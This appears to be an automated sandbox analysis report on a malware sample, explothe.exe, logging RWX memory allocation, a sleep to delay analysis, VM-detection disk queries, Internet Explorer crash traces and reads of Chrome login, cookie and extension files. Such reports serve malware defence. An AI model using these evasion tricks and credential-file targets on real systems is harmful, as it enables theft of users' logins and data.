NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6df71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6df4e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ddcb000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

explothe.exe tried to sleep 142 seconds, actually delayed analysis time by 142 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (20 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425678 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425678 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425405 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425405 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425140 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2425140 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2424910 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2424910 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2424768 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2424768 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2422107 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2422107 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421835 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421835 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421571 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421571 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421198 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 16, 2023, 9:44 a.m.	number_of_free_clusters: 2421198 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2940 crashed
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 97447616 registers.edi: 78622292 registers.eax: 97447616 registers.ebp: 97447696 registers.edx: 1042194926 registers.ebx: 97447980 registers.esi: 2147746133 registers.ecx: 78270080	1	0	0
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 81254792 registers.edi: 1974991376 registers.eax: 81254792 registers.ebp: 81254872 registers.edx: 1 registers.ebx: 8325004 registers.esi: 2147746133 registers.ecx: 2756820785	1	0	0

Application Crash

Process iexplore.exe with pid 2940 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 16, 2023, 9:45 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 97447616
registers.edi: 78622292
registers.eax: 97447616
registers.ebp: 97447696
registers.edx: 1042194926
registers.ebx: 97447980
registers.esi: 2147746133
registers.ecx: 78270080

__exception__

Oct. 16, 2023, 9:45 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 81254792
registers.edi: 1974991376
registers.eax: 81254792
registers.ebp: 81254872
registers.edx: 1
registers.ebx: 8325004
registers.esi: 2147746133
registers.ecx: 2756820785

Steals private information from local Internet browsers (50 out of 176 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielpathgobddffflal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\gjagmgpathdbbciopjhllkdnddhcglnemk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehpathddafch
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RFf0a067.TMP
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghpathoadd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnpath
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RFf12ac5.TMP
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
